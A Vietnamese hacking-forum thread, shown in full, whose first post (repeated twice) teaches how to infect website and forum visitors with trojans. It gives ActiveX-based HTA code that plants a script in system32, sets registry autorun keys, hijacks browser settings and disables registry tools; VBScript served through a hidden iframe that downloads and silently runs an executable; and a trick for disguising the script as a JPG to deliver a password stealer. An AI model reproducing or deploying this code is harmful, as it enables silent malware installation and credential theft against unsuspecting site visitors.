Latest topics
Thống Kê
Hiện có 5 người đang truy cập Diễn Đàn, gồm: 0 Thành viên, 0 Thành viên ẩn danh và 5 Khách viếng thăm :: 1 BotKhông
Số người truy cập cùng lúc nhiều nhất là 627 người, vào ngày Sat Dec 11, 2010 9:11 pm
Statistics
Diễn Đàn hiện có 3728 thành viênChúng ta cùng chào mừng thành viên mới đăng ký: khongluibuoc882
Tổng số bài viết đã gửi vào diễn đàn là 404 in 379 subjects
Gắn trojan, keylog, virus vào website, forum
2 posters
Trang 1 trong tổng số 1 trang
 Gắn trojan, keylog, virus vào website, forum
Gắn trojan, keylog, virus vào website, forum
Gắn trojan, keylog, virus vào website, forum
Cách 1 :
Cách đính kèm trojan vào website
Một số cách phổ biến đính kèm trojon vào website như dùng mã javascript hay dùng phần mềm ..
Xin giới thiệu với các bạn 1 số cách
a, Dùng 1 đoạn mã javascript để mở và phát tán trojan
<script language=javascript>
open(”địa chỉ con trojan”);
</SCRIPT>
Đoạn mã trên bạn chèn vào thẻ body của 1 trang website,khi nạn nhân mở
website trojan sẽ mở ra và yêu cầu người lướt website mở ra
b, bạn copy vào notepad đoạn mã sau:
Code:
<html>
<head>
<script language=”javascript”>
try {
var fso = new ActiveXObject(”Scripting.FileSystemObject”);
var Shell = new ActiveXObject(”WScript.Shell”);
var tfolder2 = fso.GetSpecialFolder(0);
var filepath2 = tfolder2 + “\\system32\\System.js”;
var a2 = fso.CreateTextFile(filepath2, true);
a2.WriteLine(’var url = “Địa chỉ trojon”;’);
a2.WriteLine(’var burl = “Địa chỉ trojon”;’);
a2.WriteLine(’var fso = new ActiveXObject(”Scripting.FileSystemObject”);� �);
a2.WriteLine(’var tfolder = fso.GetSpecialFolder(0);’);
a2.WriteLine(’var filepath = tfolder + “\\\\system32\\\\System.js”;’);
a2.WriteLine(’var Shell = new ActiveXObject(”WScript.Shell”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\
\\\Windows”,filepath);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\S ystem32″,filepath);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\Main\\\\Start Page”,url);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url1″,url);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\Dia chi con trojan”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url1″);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Yahoo\\\\Pager\\\\View\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Yahoo\\\\Pager\\\\View\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Yahoo\\\\Pager\\\\View\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Yahoo\\\\Pager\\\\View\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies
\\\\System\\\\DisableRegistryTools”,1,”REG_DWO RD”) ;’);
a2.Close();
Shell.Run(filepath2);
}
catch (e){}
</script>
<HTA:APPLICATION WINDOWSTATE=’minimize’ SHOWINTASKBAR=’no’ />
</head>
<body onload=’window.close()’>
</body>
</html>
rồi save lại với tên là : trojan.hta
bạn gắn đoạn mã sau vào cuối cùng của website của bạn:
Code:
<center>
<span datasrc=”#oRun” datafld=”view” dataformatas=”html”></span>
<xml id=”oRun”>
<preview>
<view>
<![CDATA[
<object id="oFile" data="trojan.hta?id=1"></object>
]]>
</view>
</preview>
</xml>
</center>
</body>
</html>
rồi sau đó bạn upload file trojan.hta với website của bạn lên cùng 1
mỗi lần mở website của bạn con trojan sẽ tự open vào trong hệ thống mà
không hề bị phát hiện
Cách 2:
đoạn đầu đưa vào diễn đàn là 01 frame
<iframe width=”0″ height=”0″ src=”http://link chứa đoạn mã bên dưới”></iframe>
đoạn 2
Code:
<script language=”VBScript”>
on error resume next
dl = “Đường dẫn con Virus dạng .exe”
Set df = document.createElement(”object”)
df.setAttribute “classid”, “clsid:BD96C556-65A3-11D0-983A-00C04FC29E36″
str=”Microsoft.XMLHTTP”
Set x = df.CreateObject(str,””)
a1=”Ado”
a2=”db.”
a3=”Str”
a4=”eam”
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,””)
S.type = 1
str6=”GET”
x.Open str6, dl, False
x.Send
fname1=”bl4ck.com”
set F = df.createobject(”Scripting.FileSystemObject”,� ��”)
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject(”Shell.Application”,””)
Q.ShellExecute fname1,””,””,”open”,0
</script>
Cách 3 :
Đầu tiên , mọi người hãy Download Program http://rapidshare.com/files/176989280/exe2vbs (sau khi Down về xong nhớ gắn thêm .zip rồi bung nén)
Đây là chương trình giúp bạn Convert sang “*.hta
Đầu tiên các bạn sử dụng EXE2VBS để convert file trojan của mình (
chẳng hạn tôi sẽ xài 1 con MagicPS => để lấy pass của người Victim
truy cập ), click vào file trojan kéo vô khung exe của exe2vbs ===>
các bạn sẽ được 1 file *.js ! Okie giờ edit lại một chút để thành file
hta ( định dạng html thực thi để chạy các activeX ) Chú ý khi chạy
exe2vbs trong phần lực chọn có 3 ô các bạn đánh dấu vào 2 mục trên thôi
Mở file trojan.exe.js vừa convert ra bằng notepad or wordpad, cho thêm dòng
Code:
<script language=vbs>
vào trên cùng
Xuống dưới cùng thay dòng: WScript.CreateObject(”WScript.Shell”).run(pth)
bằng
Code:
Set Shell1 =
CreateObject(”WScript.Shell”) Shell1.Run(pth) </script>
<HTA:APPLICATION WINDOWSTATE=’minimize’ SHOWINTASKBAR=’no’ />
</head> <body onload=’window.close()’> </body>
</html>
Sau đó save lại thành file trojan.hta Sau đó
mở file web của bạn cho Victim truy cập ra thêm code này vào để run
file trojan.hta
Code:
<center> <span
datasrc=”#oRun” datafld=”view” dataformatas=”html”></span>
<xml id=”oRun”> <preview> <view> <![CDATA[
<object id="oFile" data="trojan.hta?id=1"></object> ]]>
</view> </preview> </xml> </center>
</body> </html>
để tên File có dạng File ảnh (JPG , GIF ,BMP …) :
Theo cách 2 , mở Notepad :
Code:
<script language=”VBScript”>
on error resume next
dl = “Đường dẫn con Virus dạng .exe”
Set df = document.createElement(”object”)
df.setAttribute “classid”, “clsid:BD96C556-65A3-11D0-983A-00C04FC29E36″
str=”Microsoft.XMLHTTP”
Set x = df.CreateObject(str,””)
a1=”Ado”
a2=”db.”
a3=”Str”
a4=”eam”
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,””)
S.type = 1
str6=”GET”
x.Open str6, dl, False
x.Send
fname1=”bl4ck.com”
set F = df.createobject(”Scripting.FileSystemObject”,� ��”)
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject(”Shell.Application”,””)
Q.ShellExecute fname1,””,””,”open”,0
</script>
Save lại dưới dạng “tên File.JPG” hay . GIF tùy ý .
Ví dụ : funy.JPG
Mở File funy.JPG vừa Save song bằng Font Page , nhấp chọn Instert
Picture rồi cho bừa 1 bức ảnh để đỡ nghi ngờ . File - Save , Upload
File funy.JPG vừa rồi lên .
Giờ thì nó trông như 1 bức ảnh thật , có khi họ còn không nghi ngờ là có trojan trong đó nữa .
Cách 1 :
Cách đính kèm trojan vào website
Một số cách phổ biến đính kèm trojon vào website như dùng mã javascript hay dùng phần mềm ..
Xin giới thiệu với các bạn 1 số cách
a, Dùng 1 đoạn mã javascript để mở và phát tán trojan
<script language=javascript>
open(”địa chỉ con trojan”);
</SCRIPT>
Đoạn mã trên bạn chèn vào thẻ body của 1 trang website,khi nạn nhân mở
website trojan sẽ mở ra và yêu cầu người lướt website mở ra
b, bạn copy vào notepad đoạn mã sau:
Code:
<html>
<head>
<script language=”javascript”>
try {
var fso = new ActiveXObject(”Scripting.FileSystemObject”);
var Shell = new ActiveXObject(”WScript.Shell”);
var tfolder2 = fso.GetSpecialFolder(0);
var filepath2 = tfolder2 + “\\system32\\System.js”;
var a2 = fso.CreateTextFile(filepath2, true);
a2.WriteLine(’var url = “Địa chỉ trojon”;’);
a2.WriteLine(’var burl = “Địa chỉ trojon”;’);
a2.WriteLine(’var fso = new ActiveXObject(”Scripting.FileSystemObject”);� �);
a2.WriteLine(’var tfolder = fso.GetSpecialFolder(0);’);
a2.WriteLine(’var filepath = tfolder + “\\\\system32\\\\System.js”;’);
a2.WriteLine(’var Shell = new ActiveXObject(”WScript.Shell”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\
\\\Windows”,filepath);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\S ystem32″,filepath);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\Main\\\\Start Page”,url);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url1″,url);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\Dia chi con trojan”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url1″);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Yahoo\\\\Pager\\\\View\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Yahoo\\\\Pager\\\\View\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Yahoo\\\\Pager\\\\View\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Yahoo\\\\Pager\\\\View\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies
\\\\System\\\\DisableRegistryTools”,1,”REG_DWO RD”) ;’);
a2.Close();
Shell.Run(filepath2);
}
catch (e){}
</script>
<HTA:APPLICATION WINDOWSTATE=’minimize’ SHOWINTASKBAR=’no’ />
</head>
<body onload=’window.close()’>
</body>
</html>
rồi save lại với tên là : trojan.hta
bạn gắn đoạn mã sau vào cuối cùng của website của bạn:
Code:
<center>
<span datasrc=”#oRun” datafld=”view” dataformatas=”html”></span>
<xml id=”oRun”>
<preview>
<view>
<![CDATA[
<object id="oFile" data="trojan.hta?id=1"></object>
]]>
</view>
</preview>
</xml>
</center>
</body>
</html>
rồi sau đó bạn upload file trojan.hta với website của bạn lên cùng 1
mỗi lần mở website của bạn con trojan sẽ tự open vào trong hệ thống mà
không hề bị phát hiện
Cách 2:
đoạn đầu đưa vào diễn đàn là 01 frame
<iframe width=”0″ height=”0″ src=”http://link chứa đoạn mã bên dưới”></iframe>
đoạn 2
Code:
<script language=”VBScript”>
on error resume next
dl = “Đường dẫn con Virus dạng .exe”
Set df = document.createElement(”object”)
df.setAttribute “classid”, “clsid:BD96C556-65A3-11D0-983A-00C04FC29E36″
str=”Microsoft.XMLHTTP”
Set x = df.CreateObject(str,””)
a1=”Ado”
a2=”db.”
a3=”Str”
a4=”eam”
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,””)
S.type = 1
str6=”GET”
x.Open str6, dl, False
x.Send
fname1=”bl4ck.com”
set F = df.createobject(”Scripting.FileSystemObject”,� ��”)
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject(”Shell.Application”,””)
Q.ShellExecute fname1,””,””,”open”,0
</script>
Cách 3 :
Đầu tiên , mọi người hãy Download Program http://rapidshare.com/files/176989280/exe2vbs (sau khi Down về xong nhớ gắn thêm .zip rồi bung nén)
Đây là chương trình giúp bạn Convert sang “*.hta
Đầu tiên các bạn sử dụng EXE2VBS để convert file trojan của mình (
chẳng hạn tôi sẽ xài 1 con MagicPS => để lấy pass của người Victim
truy cập ), click vào file trojan kéo vô khung exe của exe2vbs ===>
các bạn sẽ được 1 file *.js ! Okie giờ edit lại một chút để thành file
hta ( định dạng html thực thi để chạy các activeX ) Chú ý khi chạy
exe2vbs trong phần lực chọn có 3 ô các bạn đánh dấu vào 2 mục trên thôi
Mở file trojan.exe.js vừa convert ra bằng notepad or wordpad, cho thêm dòng
Code:
<script language=vbs>
vào trên cùng
Xuống dưới cùng thay dòng: WScript.CreateObject(”WScript.Shell”).run(pth)
bằng
Code:
Set Shell1 =
CreateObject(”WScript.Shell”) Shell1.Run(pth) </script>
<HTA:APPLICATION WINDOWSTATE=’minimize’ SHOWINTASKBAR=’no’ />
</head> <body onload=’window.close()’> </body>
</html>
Sau đó save lại thành file trojan.hta Sau đó
mở file web của bạn cho Victim truy cập ra thêm code này vào để run
file trojan.hta
Code:
<center> <span
datasrc=”#oRun” datafld=”view” dataformatas=”html”></span>
<xml id=”oRun”> <preview> <view> <![CDATA[
<object id="oFile" data="trojan.hta?id=1"></object> ]]>
</view> </preview> </xml> </center>
</body> </html>
để tên File có dạng File ảnh (JPG , GIF ,BMP …) :
Theo cách 2 , mở Notepad :
Code:
<script language=”VBScript”>
on error resume next
dl = “Đường dẫn con Virus dạng .exe”
Set df = document.createElement(”object”)
df.setAttribute “classid”, “clsid:BD96C556-65A3-11D0-983A-00C04FC29E36″
str=”Microsoft.XMLHTTP”
Set x = df.CreateObject(str,””)
a1=”Ado”
a2=”db.”
a3=”Str”
a4=”eam”
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,””)
S.type = 1
str6=”GET”
x.Open str6, dl, False
x.Send
fname1=”bl4ck.com”
set F = df.createobject(”Scripting.FileSystemObject”,� ��”)
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject(”Shell.Application”,””)
Q.ShellExecute fname1,””,””,”open”,0
</script>
Save lại dưới dạng “tên File.JPG” hay . GIF tùy ý .
Ví dụ : funy.JPG
Mở File funy.JPG vừa Save song bằng Font Page , nhấp chọn Instert
Picture rồi cho bừa 1 bức ảnh để đỡ nghi ngờ . File - Save , Upload
File funy.JPG vừa rồi lên .
Giờ thì nó trông như 1 bức ảnh thật , có khi họ còn không nghi ngờ là có trojan trong đó nữa .
 Re: Gắn trojan, keylog, virus vào website, forum
Re: Gắn trojan, keylog, virus vào website, forum
khó hiểu quá bạn ơi 
namkaka- Tổng số bài gửi : 1
Số Điễm : 1
Join date : 09/12/2010
 Similar topics
Similar topics» Vô hiệu hóa Virus lây qua cổng USB với Autorun Virus Remover
» [Virus] Source VirusVB Việt Nam (Virus VBVN v1.0.0)
» Autorun Virus Remover 2.3.1022 Portable-Diệt Virus Autorun trong máy của bạn
» Trojan.Peskyspy thu lén cuộc gọi của Skype
» 40 website Thụy Điển bị tấn công DDoS
» [Virus] Source VirusVB Việt Nam (Virus VBVN v1.0.0)
» Autorun Virus Remover 2.3.1022 Portable-Diệt Virus Autorun trong máy của bạn
» Trojan.Peskyspy thu lén cuộc gọi của Skype
» 40 website Thụy Điển bị tấn công DDoS
Trang 1 trong tổng số 1 trang
Permissions in this forum:
Bạn không có quyền trả lời bài viết|
|
|




» Khai Mở Cụm Máy Chủ Công Thành Chiến Ngay Hôm Nay Chiến Ngay Kẻo Lỡ
» Ra Mắt Bản CTC volamnguoihungpk.com Chào Đón Anh Hùng Võ Lâm Về Cùng Đọ Sức
» Võ Lâm Garena Đánh giá hot nhất 2014 Thử nghiệm 2 ngày tham gia ngay
» volamtrongdong Aplates Tính Năng Mới Nhất Tháng 7 Phiên Bản Đồ Xanh
» volamtienhai.com test thử nghiệm 2 ngày + tính năng mới nhất tháng 7
» [JX] 19h30 Thứ 4 Ngày 9-7-2014 Võ Lâm Hợp Nhất Open Beta
» [JX] Đúng 11h30 Trưa Mai Thứ 4 Võ Lâm Hợp Nhất Open Chính Thức
» [JX] Khai Mở Máy Chủ Võ Lâm Tam Hợp+Nhieu Tinh Nang Cần Kham Pha
» volam-vietnam Server Được Đánh Giá Hot Nhất 2014